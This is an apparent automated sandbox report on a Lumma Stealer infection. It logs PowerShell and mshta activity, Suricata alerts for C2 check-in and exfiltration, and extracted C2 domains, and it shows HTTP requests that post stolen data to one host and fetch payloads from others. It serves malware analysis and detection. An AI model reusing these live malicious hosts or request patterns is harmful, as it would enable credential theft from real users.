                  Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb~ source: powershell.exe, 00000009.00000002.3125436846.0000000007805000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.3125436846.0000000007805000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Management.Automation.pdb-2476756634-1003_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32ement.Infrastructure.Native.dll3f5f source: powershell.exe, 00000009.00000002.3125696403.000000000782D000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.3125696403.000000000780C000.00000004.00000020.00020000.00000000.sdmp
                  Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.19041.1110_none_c0da534e38c01f4dJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Windows\SysWOW64\OneCoreUAPCommonProxyStub.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Windows\SysWOW64\OneCoreCommonProxyStub.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Windows\SysWOW64\sppc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Windows\SysWOW64\Bcp47Langs.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Windows\SysWOW64\USERENV.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov word ptr [eax], cx8_2_00422870
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov word ptr [eax], cx8_2_00422870
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then lea ecx, dword ptr [eax+0000069Fh]8_2_00422870
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx esi, word ptr [esp+edx*2]8_2_0043C210
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 6E87DD67h8_2_0043C210
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov eax, edi8_2_00438C90
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov esi, edx8_2_004085D0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov byte ptr [ecx], bl8_2_0040D643
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ecx, dword ptr [esi+24h]8_2_0040D643
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov byte ptr [edi], bl8_2_0040D643
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx esi, word ptr [esp+ecx*2]8_2_0043E720
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx ecx, word ptr [esp+edi*2+34h]8_2_0041B84B
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp eax8_2_0043F800
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then lea ecx, dword ptr [edx+000026D6h]8_2_0041D810
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp al, 2Eh8_2_00426837
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then lea eax, dword ptr [ecx+ecx]8_2_0042C097
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx esi, word ptr [ebx+eax*2]8_2_0040B8A4
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp byte ptr [esi+ebx], 00000000h8_2_0042A8B0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp eax8_2_0043F8B0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov esi, ecx8_2_00409140
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp eax8_2_0043F940
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then lea ecx, dword ptr [eax+00006C8Ch]8_2_0042D941
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov eax, dword ptr [0044A184h]8_2_0042D14C
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx ebx, byte ptr [edx]8_2_00436150
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp dword ptr [edi+eax*8], 385488F2h8_2_004191D0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx ebx, word ptr [esp+eax*2+04h]8_2_004191D0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx esi, word ptr [esp+eax*2]8_2_0043C980
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx edx, word ptr [ecx]8_2_0043A1A9
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx edx, word ptr [esp+eax*2-000112FCh]8_2_00417A51
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx esi, word ptr [esp+eax*2+00000130h]8_2_00417A51
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov esi, eax8_2_00417A51
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp word ptr [ebp+ebx+02h], 0000h8_2_00421200
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov word ptr [eax], cx8_2_00421200
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov word ptr [ecx], dx8_2_00417303
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov word ptr [eax], cx8_2_00417303
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]8_2_0042A320
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx ebx, word ptr [eax]8_2_0041B323
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov byte ptr [edi], cl8_2_0041B323
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then add ecx, esi8_2_004253E5
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov edi, eax8_2_00402BA0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]8_2_004073B0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]8_2_004073B0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov eax, dword ptr [00447218h]8_2_00424C22
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov word ptr [eax], cx8_2_0040E425
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then lea ecx, dword ptr [eax-00004752h]8_2_0042BC3F
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov byte ptr [edi], al8_2_0042BC3F
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then lea ecx, dword ptr [eax-00004752h]8_2_0042BCC8
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov byte ptr [edi], al8_2_0042BCC8
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx edi, word ptr [edx+esi*2]8_2_004274E8
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ecx, dword ptr [esi+08h]8_2_0042DCFD
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx edx, word ptr [esp+eax*2+04h]8_2_0043C480
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov word ptr [eax], cx8_2_0041B4B9
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp eax8_2_0043F5C0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx esi, word ptr [esp+eax*2+0Ch]8_2_00413DA0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov word ptr [eax], cx8_2_0040E65B
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then lea ecx, dword ptr [eax-00007F25h]8_2_004146D0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp eax8_2_0043F6D0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx esi, word ptr [esp+edx*2+1Ch]8_2_004396F0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 4B1BF3DAh8_2_004396F0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp word ptr [eax+ecx+02h], 0000h8_2_004396F0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx edx, word ptr [esp+eax*2]8_2_004406F0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx ebp, word ptr [esp+edx*2]8_2_004406F0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx ecx, word ptr [esp+edi*2+02h]8_2_0043D71C
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp eax8_2_0043F5C0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx esi, word ptr [esp+ecx*2]8_2_0043E7DE
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx esi, word ptr [esp+ecx*2+1Ch]8_2_0043EFF1
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movsx eax, byte ptr [edx+ebp]8_2_0043EFF1
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov byte ptr [ecx], al8_2_0042D7B7

                  Networking

                  barindex
                  Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49984 -> 188.114.96.3:443
                  Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49984 -> 188.114.96.3:443
                  Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49983 -> 188.114.96.3:443
                  Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49983 -> 188.114.96.3:443
                  Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49986 -> 188.114.96.3:443
                  Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49992 -> 188.114.96.3:443
                  Source: Malware configuration extractorURLs: appliacnesot.buzz
                  Source: Malware configuration extractorURLs: scentniej.buzz
                  Source: Malware configuration extractorURLs: inherineau.buzz
                  Source: Malware configuration extractorURLs: screwamusresz.buzz
                  Source: Malware configuration extractorURLs: hummskitnj.buzz
                  Source: Malware configuration extractorURLs: rebuildeso.buzz
                  Source: Malware configuration extractorURLs: prisonyfork.buzz
                  Source: Malware configuration extractorURLs: cashfuzysao.buzz
                  Source: Malware configuration extractorURLs: permissiblene.click
                  Source: global trafficHTTP traffic detected: GET /Scheele.pt HTTP/1.1Host: t1.awagama2.orgConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 104.21.37.128 104.21.37.128
                  Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                  Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                  Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                  Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                  Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                  Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49983 -> 188.114.96.3:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49986 -> 188.114.96.3:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49988 -> 188.114.96.3:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49990 -> 188.114.96.3:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49989 -> 188.114.96.3:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49987 -> 188.114.96.3:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49984 -> 188.114.96.3:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49991 -> 188.114.96.3:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49992 -> 188.114.96.3:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49993 -> 104.21.37.128:443
                  Source: Network trafficSuricata IDS: 2008438 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send a Text File : 104.21.37.128:443 -> 192.168.2.5:49993
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: permissiblene.click
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 77Host: permissiblene.click
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=XAFS5EBEID00HPUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12809Host: permissiblene.click
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=QAJY2769OHRUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15033Host: permissiblene.click
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=NWPK6ZAAQUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20511Host: permissiblene.click
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=FPNR0FJKAFCPRUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 5450Host: permissiblene.click
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=DOFL1NC99H51R36QCUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1232Host: permissiblene.click
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=643076B20D50MOJPUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1092Host: permissiblene.click
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 112Host: permissiblene.click
                  Source: global trafficHTTP traffic detected: GET /int_clp_sha.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: klipvumisui.shop
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /Scheele.pt HTTP/1.1Host: t1.awagama2.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /int_clp_sha.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: klipvumisui.shop
                  Source: global trafficDNS traffic detected: DNS query: t1.awagama2.org
                  Source: global trafficDNS traffic detected: DNS query: permissiblene.click
                  Source: global trafficDNS traffic detected: DNS query: klipvumisui.shop
                  Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: permissiblene.click
                  Source: powershell.exe, 00000008.00000002.3011067943.00000000055B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://certs.securetrust.com/issuers/VCTWGTSCA_L1.crt0
                  Source: powershell.exe, 00000009.00000002.3125696403.000000000782D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
                  Source: powershell.exe, 00000004.00000002.2859045142.00000000074BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
                  Source: powershell.exe, 00000008.00000002.3010448615.000000000559C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.trustwave.com/TWGCA.crl0n
                  Source: powershell.exe, 00000008.00000002.3011067943.00000000055B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.vikingcloud.com/VCTWGTSCA_L1.crl0
                  Source: powershell.exe, 00000002.00000002.2058549903.0000000005B59000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2824318533.0000000005BC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                  Source: powershell.exe, 00000008.00000002.3010448615.000000000559C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.trustwave.com/06
                  Source: powershell.exe, 00000008.00000002.3011067943.00000000055B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.vikingcloud.com/0A
                  Source: powershell.exe, 00000004.00000002.2824318533.0000000004CB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                  Source: powershell.exe, 00000009.00000002.3040273310.0000000005281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                  Source: powershell.exe, 00000002.00000002.2053184182.0000000004AF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2824318533.0000000004B61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3040273310.0000000005131000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: powershell.exe, 00000009.00000002.3040273310.0000000005281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                  Source: powershell.exe, 00000008.00000002.3010448615.000000000559C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ssl.trustwave.com/issuers/TWGCA.crt0
                  Source: powershell.exe, 00000004.00000002.2824318533.0000000004CB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                  Source: powershell.exe, 00000009.00000002.3031345788.0000000003111000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aka..FT_
                  Source: powershell.exe, 00000002.00000002.2053184182.0000000004AF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2824318533.0000000004B61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3040273310.0000000005131000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBsq
                  Source: powershell.exe, 00000009.00000002.3040273310.0000000005281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                  Source: powershell.exe, 00000008.00000002.3011067943.00000000055B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://certs.securetrust.com/CA0
                  Source: powershell.exe, 00000004.00000002.2824318533.0000000005BC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 00000004.00000002.2824318533.0000000005BC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 00000004.00000002.2824318533.0000000005BC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                  Source: powershell.exe, 00000004.00000002.2824318533.0000000004CB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                  Source: powershell.exe, 00000002.00000002.2053184182.0000000005104000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                  Source: powershell.exe, 00000008.00000002.3005785621.00000000030BA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3001201192.0000000003047000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/
                  Source: powershell.exe, 00000008.00000002.3005785621.00000000030BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/h
                  Source: powershell.exe, 00000008.00000002.3010678898.00000000055A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/int_clp_sha.txt
                  Source: powershell.exe, 00000008.00000002.3010678898.00000000055A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/int_clp_sha.txtH
                  Source: powershell.exe, 00000008.00000002.3010678898.00000000055A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/int_clp_sha.txtr
                  Source: powershell.exe, 00000008.00000002.3010678898.00000000055A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/int_clp_sha.txts
                  Source: powershell.exe, 00000008.00000002.3001201192.00000000030AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop:443/int_clp_sha.txt
                  Source: powershell.exe, 00000002.00000002.2058549903.0000000005B59000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2824318533.0000000005BC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                  Source: powershell.exe, 00000008.00000002.3009863831.0000000005520000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permissiblene.click/
                  Source: powershell.exe, 00000008.00000002.3005785621.00000000030BA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3009863831.0000000005520000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permissiblene.click/api
                  Source: powershell.exe, 00000008.00000002.3009863831.0000000005520000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permissiblene.click/apiU)r
                  Source: powershell.exe, 00000008.00000002.3001201192.00000000030AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://permissiblene.click:443/api
                  Source: powershell.exe, 00000008.00000002.3010448615.000000000559C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.trustwave.com/CA03
                  Source: powershell.exe, 00000002.00000002.2052003565.0000000002DC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t1.awagam
                  Source: powershell.exe, 00000004.00000002.2824318533.0000000004CB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t1.awagama2.org
                  Source: powershell.exe, 00000002.00000002.2053184182.0000000005104000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t1.awagama2.org/Scheele.LRsq
                  Source: powershell.exe, 00000002.00000002.2053184182.0000000005104000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t1.awagama2.org/Scheele.pLRsq
                  Source: powershell.exe, 00000004.00000002.2822879448.0000000002E09000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2824318533.0000000004CB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t1.awagama2.org/Scheele.pt
                  Source: powershell.exe, 00000004.00000002.2823673886.0000000003087000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t1.awagama2.org/scheele.pt
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49993 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
